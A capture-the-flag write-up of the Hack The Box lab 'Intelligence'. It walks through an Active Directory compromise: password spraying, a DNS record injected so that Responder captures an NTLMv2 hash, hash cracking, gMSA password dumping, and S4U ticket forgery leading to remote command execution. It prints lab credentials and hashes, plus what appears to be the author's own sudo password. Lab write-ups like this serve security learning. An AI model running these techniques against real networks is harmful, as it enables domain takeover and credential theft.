Medium difficulty box - https://hackthebox.com
Intelligence was a medium box I solved a few months ago. It’s also technically the first machine I decided to share a write-up for, because I really enjoyed solving it.
RECON
nmap -A 10.10.10.248 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-26 16:35 CEST
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 41.30% done; ETC: 16:35 (0:00:04 remaining)
Nmap scan report for 10.10.10.248
Host is up (0.028s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-08-26 22:09:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-08-26T22:10:38+00:00; +7h33m44s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-08-26T22:10:38+00:00; +7h33m45s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-08-26T22:10:38+00:00; +7h33m44s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-08-26T22:10:38+00:00; +7h33m45s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h33m44s, deviation: 0s, median: 7h33m44s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-08-26T22:09:58
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.40 seconds
FOOTHOLD
Basic enumeration of the website on port 80 shows we can download a pdf file with a specific name convention.
Fuzzing the date part of the pdf file seemed like a good idea:
ffuf -w dates.txt -u http://intelligence.htb/documents/FUZZ-upload.pdf -mc 200
ffuf
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://intelligence.htb/documents/FUZZ-upload.pdf
:: Wordlist : FUZZ: dates.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
2020-01-20 [Status: 200, Size: 11632, Words: 157, Lines: 127]
2020-01-23 [Status: 200, Size: 11557, Words: 167, Lines: 136]
2020-01-01 [Status: 200, Size: 26835, Words: 241, Lines: 209]
<SNIP>
2021-02-25 [Status: 200, Size: 26700, Words: 228, Lines: 180]
2021-03-01 [Status: 200, Size: 11254, Words: 175, Lines: 135]
2021-03-07 [Status: 200, Size: 10676, Words: 164, Lines: 139]
2021-03-10 [Status: 200, Size: 25109, Words: 240, Lines: 199]
2021-03-18 [Status: 200, Size: 27992, Words: 220, Lines: 203]
2021-03-21 [Status: 200, Size: 26810, Words: 229, Lines: 205]
2021-03-25 [Status: 200, Size: 27327, Words: 231, Lines: 211]
2021-03-27 [Status: 200, Size: 12127, Words: 166, Lines: 141]
2020-03-13 [Status: 200, Size: 24888, Words: 213, Lines: 204]
2020-07-08 [Status: 200, Size: 11910, Words: 167, Lines: 141]
:: Progress: [578/578] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
Results show there is more than one pdf :D
starlord@HAL-9000:~/Bureau/Fun/Hackthebox/Intelligence$ ls
dates.txt get_doc_info.py intelligence-writeup kerbrute_linux_amd64 names.txt test user.txt
starlord@HAL-9000:~/Bureau/Fun/Hackthebox/Intelligence$ cat results.txt | awk '{print $1}'
2020-01-20
2020-01-23
2020-01-01
2020-01-02
2020-01-30
2020-01-04
<SNIP>
2021-03-25
2021-03-27
2020-03-13
2020-07-08
starlord@HAL-9000:~/Bureau/Fun/Hackthebox/Intelligence$ cat results.txt | awk '{print $1}' > results.txt
From here I kept trying to force myself to automate because it felt like a waste of good time to click everything, considering the quantity.
#download_valid_pdfs.sh
cat results.txt | while read i
do
curl http://intelligence.htb/documents/$i-upload.pdf -o $i-upload.pdf
done;
Download everything:
starlord@HAL-9000:~/Bureau/Fun/Hackthebox/Intelligence$ ./download_valid_pdfs.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 11632 100 11632 0 0 270k 0 --:--:-- --:--:-- --:--:-- 270k
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 11557 100 11557 0 0 225k 0 --:--:-- --:--:-- --:--:-- 225k
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 26835 100 26835 0 0 374k 0 --:--:-- --:--:-- --:--:-- 379k
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 27002 100 27002 0 0 393k 0 --:--:-- --:--:-- --:--:-- 399k
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 26706 100 26706 0 0 401k 0 --:--:-- --:--:-- --:--:-- 407k
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 27522 100 27522 0 0 389k 0 --:--:-- --:--:-- --:--:-- 389k
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 11228 100 11228 0 0 228k 0 --:--:-- --:--:-- --:--:-- 228k
<SNIP>
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 11910 100 11910 0 0 232k 0 --:--:-- --:--:-- --:--:-- 232k
Make sure everything is here:
starlord@HAL-9000:~/Bureau/Fun/Hackthebox/Intelligence$ ls
2020-01-01-upload.pdf 2020-03-12-upload.pdf 2020-05-29-upload.pdf 2020-07-06-upload.pdf 2020-09-22-upload.pdf 2020-12-20-upload.pdf 2021-03-21-upload.pdf
2020-01-02-upload.pdf 2020-03-13-upload.pdf 2020-06-02-upload.pdf 2020-07-08-upload.pdf 2020-09-27-upload.pdf 2020-12-24-upload.pdf 2021-03-25-upload.pdf
2020-01-04-upload.pdf 2020-03-17-upload.pdf 2020-06-03-upload.pdf 2020-07-20-upload.pdf 2020-09-29-upload.pdf 2020-12-28-upload.pdf 2021-03-27-upload.pdf
2020-01-10-upload.pdf 2020-03-21-upload.pdf 2020-06-04-upload.pdf 2020-07-24-upload.pdf 2020-09-30-upload.pdf 2020-12-30-upload.pdf dates.txt
2020-01-20-upload.pdf 2020-04-02-upload.pdf 2020-06-07-upload.pdf 2020-08-01-upload.pdf 2020-10-05-upload.pdf 2021-01-03-upload.pdf get_doc_info.py
2020-01-22-upload.pdf 2020-04-04-upload.pdf 2020-06-08-upload.pdf 2020-08-03-upload.pdf 2020-10-19-upload.pdf 2021-01-14-upload.pdf intelligence-writeup
2020-01-23-upload.pdf 2020-04-15-upload.pdf 2020-06-12-upload.pdf 2020-08-09-upload.pdf 2020-11-01-upload.pdf 2021-01-25-upload.pdf kerbrute_linux_amd64
2020-01-25-upload.pdf 2020-04-23-upload.pdf 2020-06-14-upload.pdf 2020-08-19-upload.pdf 2020-11-03-upload.pdf 2021-01-30-upload.pdf names.txt
2020-01-30-upload.pdf 2020-05-01-upload.pdf 2020-06-15-upload.pdf 2020-08-20-upload.pdf 2020-11-06-upload.pdf 2021-02-10-upload.pdf results.txt
2020-02-11-upload.pdf 2020-05-03-upload.pdf 2020-06-21-upload.pdf 2020-09-02-upload.pdf 2020-11-10-upload.pdf 2021-02-13-upload.pdf test
2020-02-17-upload.pdf 2020-05-07-upload.pdf 2020-06-22-upload.pdf 2020-09-04-upload.pdf 2020-11-11-upload.pdf 2021-02-21-upload.pdf user.txt
2020-02-23-upload.pdf 2020-05-11-upload.pdf 2020-06-25-upload.pdf 2020-09-05-upload.pdf 2020-11-13-upload.pdf 2021-02-25-upload.pdf
2020-02-24-upload.pdf 2020-05-17-upload.pdf 2020-06-26-upload.pdf 2020-09-06-upload.pdf 2020-11-24-upload.pdf 2021-03-01-upload.pdf
2020-02-28-upload.pdf 2020-05-20-upload.pdf 2020-06-28-upload.pdf 2020-09-11-upload.pdf 2020-11-30-upload.pdf 2021-03-07-upload.pdf
2020-03-04-upload.pdf 2020-05-21-upload.pdf 2020-06-30-upload.pdf 2020-09-13-upload.pdf 2020-12-10-upload.pdf 2021-03-10-upload.pdf
2020-03-05-upload.pdf 2020-05-24-upload.pdf 2020-07-02-upload.pdf 2020-09-16-upload.pdf 2020-12-15-upload.pdf 2021-03-18-upload.pdf
These pdf files hold an interesting piece of metadata which is the pdf Creator. This will definitely be useful later on. Now, more automation:
# get_doc_info.py
from PyPDF2 import PdfFileReader
def get_info(files):
for pdf in files:
with open(pdf, 'rb') as f:
pdf = PdfFileReader(f)
info = pdf.getDocumentInfo()
number_of_pages = pdf.getNumPages()
print(info)
author = info.author
creator = info.creator
producer = info.producer
subject = info.subject
title = info.title
if __name__ == '__main__':
files = ['2020-01-01-upload.pdf','2020-03-12-upload.pdf','2020-05-29-upload.pdf','2020-07-06-upload.pdf',
<SNIP>
'2021-03-10-upload.pdf','2020-03-05-upload.pdf','2020-05-24-upload.pdf','2020-07-02-upload.pdf',
'2020-09-16-upload.pdf','2020-12-15-upload.pdf','2021-03-18-upload.pdf']
get_info(files)
Output:
{'/Creator': 'William.Lee'}
{'/Creator': 'Thomas.Valenzuela'}
{'/Creator': 'Thomas.Valenzuela'}
{'/Creator': 'Scott.Scott'}
{'/Creator': 'Tiffany.Molina'}
{'/Creator': 'David.Wilson'}
{'/Creator': 'Veronica.Patel'}
{'/Creator': 'Scott.Scott'}
{'/Creator': 'Travis.Evans'}
{'/Creator': 'David.Reed'}
{'/Creator': 'Teresa.Williamson'}
{'/Creator': 'Jose.Williams'}
{'/Creator': 'Thomas.Hall'}
{'/Creator': 'Ian.Duncan'}
{'/Creator': 'Jason.Wright'}
{'/Creator': 'Samuel.Richardson'}
{'/Creator': 'Kaitlyn.Zimmerman'}
{'/Creator': 'John.Coleman'}
{'/Creator': 'Jessica.Moody'}
{'/Creator': 'Ian.Duncan'}
{'/Creator': 'Richard.Williams'}
{'/Creator': 'Veronica.Patel'}
{'/Creator': 'Richard.Williams'}
{'/Creator': 'Jason.Patterson'}
{'/Creator': 'Veronica.Patel'}
{'/Creator': 'Brian.Baker'}
{'/Creator': 'Jason.Patterson'}
{'/Creator': 'Jennifer.Thomas'}
{'/Creator': 'David.Mcbride'}
{'/Creator': 'Thomas.Valenzuela'}
{'/Creator': 'John.Coleman'}
{'/Creator': 'Anita.Roberts'}
{'/Creator': 'Stephanie.Young'}
{'/Creator': 'Danny.Matthews'}
{'/Creator': 'Jose.Williams'}
{'/Creator': 'David.Mcbride'}
{'/Creator': 'Samuel.Richardson'}
{'/Creator': 'Teresa.Williamson'}
{'/Creator': 'Kaitlyn.Zimmerman'}
{'/Creator': 'David.Reed'}
{'/Creator': 'John.Coleman'}
{'/Creator': 'Darryl.Harris'}
{'/Creator': 'Ian.Duncan'}
{'/Creator': 'Kaitlyn.Zimmerman'}
{'/Creator': 'Travis.Evans'}
{'/Creator': 'Stephanie.Young'}
{'/Creator': 'William.Lee'}
{'/Creator': 'William.Lee'}
{'/Creator': 'Nicole.Brock'}
{'/Creator': 'Jose.Williams'}
{'/Creator': 'Kelly.Long'}
{'/Creator': 'Daniel.Shelton'}
{'/Creator': 'Anita.Roberts'}
{'/Creator': 'Stephanie.Young'}
{'/Creator': 'William.Lee'}
{'/Creator': 'Stephanie.Young'}
{'/Creator': 'Danny.Matthews'}
{'/Creator': 'Jose.Williams'}
{'/Creator': 'Brian.Baker'}
{'/Creator': 'David.Reed'}
{'/Creator': 'Jason.Wright'}
{'/Creator': 'Samuel.Richardson'}
{'/Creator': 'Travis.Evans'}
{'/Creator': 'John.Coleman'}
{'/Creator': 'Jose.Williams'}
{'/Creator': 'Nicole.Brock'}
{'/Creator': 'Travis.Evans'}
{'/Creator': 'Tiffany.Molina'}
{'/Creator': 'Jessica.Moody'}
{'/Creator': 'Jason.Wright'}
{'/Creator': 'David.Mcbride'}
{'/Creator': 'David.Mcbride'}
{'/Creator': 'David.Mcbride'}
{'/Creator': 'Ian.Duncan'}
{'/Creator': 'Thomas.Valenzuela'}
{'/Creator': 'Jose.Williams'}
{'/Creator': 'Kelly.Long'}
{'/Creator': 'William.Lee'}
{'/Creator': 'Jessica.Moody'}
{'/Creator': 'Kelly.Long'}
{'/Creator': 'Anita.Roberts'}
{'/Creator': 'Daniel.Shelton'}
{'/Creator': 'John.Coleman'}
{'/Creator': 'Stephanie.Young'}
{'/Creator': 'Ian.Duncan'}
{'/Creator': 'Travis.Evans'}
{'/Creator': 'Stephanie.Young'}
{'/Creator': 'Brian.Morris'}
{'/Creator': 'Jose.Williams'}
{'/Creator': 'John.Coleman'}
{'/Creator': 'Jason.Wright'}
{'/Creator': 'Ian.Duncan'}
{'/Creator': 'David.Reed'}
{'/Creator': 'Jennifer.Thomas'}
{'/Creator': 'Nicole.Brock'}
{'/Creator': 'David.Wilson'}
{'/Creator': 'Richard.Williams'}
{'/Creator': 'Jose.Williams'}
{'/Creator': 'Jose.Williams'}
Turned this output into another list
python3 get_doc_info.py | awk '{print $2}'| sed 's/..$//;s/.//' > users_clean.txt
Now to read all of those pdfs (or at least only check for certain risky keywords), without spending time opening them all manually, I needed some more scripting:
#find_keywords.py
from pdfminer.high_level import extract_text
files = ['2020-01-01-upload.pdf','2020-03-12-upload.pdf','2020-05-29-upload.pdf','2020-07-06-upload.pdf',
<SNIP>
'2020-09-16-upload.pdf','2020-12-15-upload.pdf','2021-03-18-upload.pdf']
keyword = "user" #or "password" or "Account" or "login"
for i in files:
text = extract_text(i)
if keyword in text:
print(i)
print(text)
Output:
2020-06-04-upload.pdf
New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.
At this point, we have made a lot of output, lets make a checkpoint.
We have a password NewIntelligenceCorpUser9876 and a list of users we can use to spray the machine.
I assumed with this many users, there were fair chances that one of them didn’t manage to change his default password.
I used crackmapexec to spray the password against the users list:
crackmapexec smb intelligence.htb -u users_clean.txt -p NewIntelligenceCorpUser9876
Which confirmed the user Tiffany.Molina had kept default password.
smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb -H intelligence.htb
Output:
+] IP: intelligence.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
IT READ ONLY
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users READ ONLY
PRIVILEGE ESCALATION
The content of “Users” shows users’ smb shares from the machine. We can find user.txt in Tiffany.Molina’s Desktop.
smbclient //intelligence.htb/Users -U'Tiffany.Molina'
Enter WORKGROUPTiffany.Molina's password:
Try "help" to get a list of possible commands.
smb: > ls
. DR 0 Mon Apr 19 03:20:26 2021
.. DR 0 Mon Apr 19 03:20:26 2021
Administrator D 0 Mon Apr 19 02:18:39 2021
All Users DHSrn 0 Sat Sep 15 09:21:46 2018
Default DHR 0 Mon Apr 19 04:17:40 2021
Default User DHSrn 0 Sat Sep 15 09:21:46 2018
desktop.ini AHS 174 Sat Sep 15 09:11:27 2018
Public DR 0 Mon Apr 19 02:18:39 2021
Ted.Graves D 0 Mon Apr 19 03:20:26 2021
Tiffany.Molina D 0 Mon Apr 19 02:51:46 2021
3770367 blocks of size 4096. 1456196 blocks available
smb: > ls -la
NT_STATUS_NO_SUCH_FILE listing -la
smb: > cd Tiffany.MolinaDesktop
smb: > get user.txt
In the “IT” share we have a file called downdetector.ps1
starlord@HAL-9000:~/Bureau/Fun/Hackthebox/Intelligence$ smbclient //intelligence.htb/IT -U'Tiffany.Molina'
Enter WORKGROUPTiffany.Molina's password:
session setup failed: NT_STATUS_LOGON_FAILURE
starlord@HAL-9000:~/Bureau/Fun/Hackthebox/Intelligence$ smbclient //intelligence.htb/IT -U'Tiffany.Molina'
Enter WORKGROUPTiffany.Molina's password:
Try "help" to get a list of possible commands.
smb: > ls
. D 0 Mon Apr 19 02:50:55 2021
.. D 0 Mon Apr 19 02:50:55 2021
downdetector.ps1 A 1046 Mon Apr 19 02:50:55 2021
3770367 blocks of size 4096. 1456172 blocks available
smb: > allinfo
allinfo <file>
smb: > allinfo downdetector.ps1
altname: DOWNDE~1.PS1
create_time: lun avr 19 02:50:55 2021 CEST
access_time: lun avr 19 02:50:55 2021 CEST
write_time: lun avr 19 02:50:55 2021 CEST
change_time: lun avr 19 02:50:58 2021 CEST
attributes: A (20)
stream: [::$DATA], 1046 bytes
smb: > get downdetector.ps1
getting file downdetector.ps1 of size 1046 as downdetector.ps1 (11.9 KiloBytes/sec) (average 11.9 KiloBytes/sec)
smb: > exit
content of downdetector.ps1
# downdetector.ps1
��# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}
This powershell file apparently monitors the status response for each entry in the dns zone starting with web*. If it’s not status code 200 it will notify Ted.Graves, with the UseDefaultCredentials switch parameter, which :
“Indicates that the cmdlet uses the credentials of the current user to send the web request. This can't be used with Authentication or Credential and may not be supported on all platforms.”
src: microsoft powershell docs
This is a job for Responder, but first I need to add a record to the dns starting with “web” pointing to my machine. This should allow us to grab a hash and try to crack it for credentials. To do that we can use dnstool.py from krbrelayx.
let’s start Responder:
starlord@HAL-9000:~/Bureau/Fun/Hackthebox/Intelligence$ Responder.py -I tun0 -A
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.0.2.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
/! Warning: files/AccessDenied.html: file not found
/! Warning: files/BindShell.exe: file not found
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [ON]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.xx.xx]
Challenge set [1122334455667788]
Don't Respond To Names ['ISATAP']
In another window:
starlord@HAL-9000:~/Bureau/Fun/Hackthebox/Intelligence/krbrelayx$ python3 dnstool.py -u 'intelligence.htbTiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a add -r 'web_Starrydns_or_litterally_anything_else_with_web.intelligence.htb' -d <local ip> 10.10.10.248
output:
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
</code></pre>
<p>Responder receives the NTLMv2 Hash for Ted.Graves, so we can try to crack it!</p>
<pre><code class="">[+] Listening for events...
[HTTP] NTLMv2 Client : <MACHINE IP>
[HTTP] NTLMv2 Username : intelligenceTed.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:1122334455667788:C8B5809269803AA43B885BE5C452F7CC:0101000000000000753D23B43271D701F88971DBE2AC9A9D000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C0008003000300000000000000000000000002000005390A83A090299C14BEA2A5D14212C5258BF7161A4DB11E0F11AAEC4B7116CC80A0010000000000000000000000000000000000009003A0048005400540050002F007700650062006F006F00700073002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
With john, cracking the hash in a file was a matter of seconds, with the rockyou.txt wordlist:
starlord@HAL-9000:~/Bureau/Fun/Hackthebox/Intelligence$ sudo john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Mr.Teddy (Ted.Graves)
1g 0:00:00:23 DONE (2021-07-05 03:40) 0.04170g/s 450978p/s 450978c/s 450978C/s Mrz.deltasigma..Mr BOB
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
ROOT FLAG v1
With the password in the pocket we can now try more Impacket binaries, as well as gMSADumper: link:https://www.thehacker.recipes/ad/movement/access-controls/readgmsapassword
starlord@HAL-9000:~/Bureau/Tools/gMSADumper$ python3 gMSADumper.py -u "Ted.Graves" -p "Mr.Teddy" -d intelligence.htb
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::5e47bac787e5e1970cf9acdb5b316239
starlord@HAL-9000:~/Bureau/Tools/gMSADumper$ sudo su
[sudo] Mot de passe de starlord : MzU2MTMzMzIzMzM5MzMzMDM1MzkzMzMyMzYzODM2Mzg=
root@HAL-9000:/home/starlord/Bureau/Tools/gMSADumper# python3 gMSADumper.py -u "Ted.Graves" -p "Mr.Teddy" -d intelligence.htb
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::5e47bac787e5e1970cf9acdb5b316239
Because of the clock-skew between my machine and the target box, I needed to adapt my timezone
starlord@HAL-9000:~/Bureau/Tools/gMSADumper$ sudo net time set -S 10.10.10.248
Now we can use the hash and get the Ticket Granting Ticket (TGT) or Golden Ticket, which will allow us to get any Ticket Granting Service.
starlord@HAL-9000:~/Bureau/Tools/gMSADumper$ impacket-getST intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :5e47bac787e5e1970cf9acdb5b316239 -impersonate Administrator
Impacket v0.9.23.dev1+20210302.130123.df00d15c - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
starlord@HAL-9000:~/Bureau/Tools/gMSADumper$ export KRB5CCNAME=Administrator.ccache
starlord@HAL-9000:~/Bureau/Tools/gMSADumper$ impacket-atexec -k -no-pass dc.intelligence.htb "type C:UsersAdministratorDesktop
oot.txt"
Impacket v0.9.23.dev1+20210302.130123.df00d15c - Copyright 2020 SecureAuth Corporation
[!] This will work ONLY on Windows >= Vista
[*] Creating task hQJalxZl
[*] Running task hQJalxZl
[*] Deleting task hQJalxZl
[*] Attempting to read ADMIN$TemphQJalxZl.tmp
a8cb37741c3626ba5ebcb06a26140bf4
ROOT FLAG v2
impacket-smbclient -k -no-pass intelligence.htb/Administrator@dc.intelligence.htb
Impacket v0.9.23.dev1+20210302.130123.df00d15c - Copyright 2020 SecureAuth Corporation
Type help for list of commands
# ls
[-] No share selected
# help
open {host,port=445} - opens a SMB connection against the target host/port
login {domain/username,passwd} - logs into the current SMB connection, no parameters for NULL connection. If no password specified, it'll be prompted
kerberos_login {domain/username,passwd} - logs into the current SMB connection using Kerberos. If no password specified, it'll be prompted. Use the DNS resolvable domain name
login_hash {domain/username,lmhash:nthash} - logs into the current SMB connection using the password hashes
logoff - logs off
shares - list available shares
use {sharename} - connect to an specific share
cd {path} - changes the current directory to {path}
lcd {path} - changes the current local directory to {path}
pwd - shows current remote directory
password - changes the user password, the new password will be prompted for input
ls {wildcard} - lists all the files in the current directory
rm {file} - removes the selected file
mkdir {dirname} - creates the directory under the current path
rmdir {dirname} - removes the directory under the current path
put {filename} - uploads the filename into the current path
get {filename} - downloads the filename from the current path
mount {target,path} - creates a mount point from {path} to {target} (admin required)
umount {path} - removes the mount point at {path} without deleting the directory (admin required)
list_snapshots {path} - lists the vss snapshots for the specified path
info - returns NetrServerInfo main results
who - returns the sessions currently connected at the target host (admin required)
close - closes the current SMB Session
exit - terminates the server process (and this session)
After reading into the commands list I managed to navigate the smb shares.
# shares
ADMIN$
C$
IPC$
IT
NETLOGON
SYSVOL
Users
# ls
[-] No share selected
# use USERS
# ls
drw-rw-rw- 0 Mon Apr 19 03:20:26 2021 .
drw-rw-rw- 0 Mon Apr 19 03:20:26 2021 ..
drw-rw-rw- 0 Mon Apr 19 02:18:39 2021 Administrator
drw-rw-rw- 0 Mon Apr 19 05:16:30 2021 All Users
drw-rw-rw- 0 Mon Apr 19 04:17:40 2021 Default
drw-rw-rw- 0 Mon Apr 19 05:16:30 2021 Default User
-rw-rw-rw- 174 Mon Apr 19 05:15:17 2021 desktop.ini
drw-rw-rw- 0 Mon Apr 19 02:18:39 2021 Public
drw-rw-rw- 0 Mon Apr 19 03:20:26 2021 Ted.Graves
drw-rw-rw- 0 Mon Apr 19 02:51:46 2021 Tiffany.Molina
#
# cd Administrator
# cd Desktop
# ls
drw-rw-rw- 0 Mon Apr 19 02:51:57 2021 .
drw-rw-rw- 0 Mon Apr 19 02:51:57 2021 ..
-rw-rw-rw- 282 Mon Apr 19 02:40:10 2021 desktop.ini
-rw-rw-rw- 34 Thu Sep 2 14:45:58 2021 root.txt
# root.txt
*** Unknown syntax: root.txt
# type root.txt
*** Unknown syntax: type root.txt
# read root.txt
*** Unknown syntax: read root.txt
# get root.txt
https://www.hackthebox.com/achievement/machine/377831/357
SENTIMENT:
This was a very enjoyable box which made me solve both scripting and dns problems, as well as abusing group managed service accounts passwords and kerberos. I was glad to do a lab which allows to practice with Impacket tools. The user part was a great chain of eureka moments for me from the moment I realized there were more than one pdf, and the Root part was a lot of research and reading which made me learn a lot.
Thanks to the author, which is also the creator of gMSADumper🙂
Other links I will remember:
https://www.hackingarticles.in/impacket-guide-smb-msrpc/
https://www.hackingarticles.in/abusing-kerberos-using-impacket/
https://nored0x.github.io/red-teaming/Kerberos-golden-Ticket/
https://github.com/SecureAuthCorp/impacket
https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html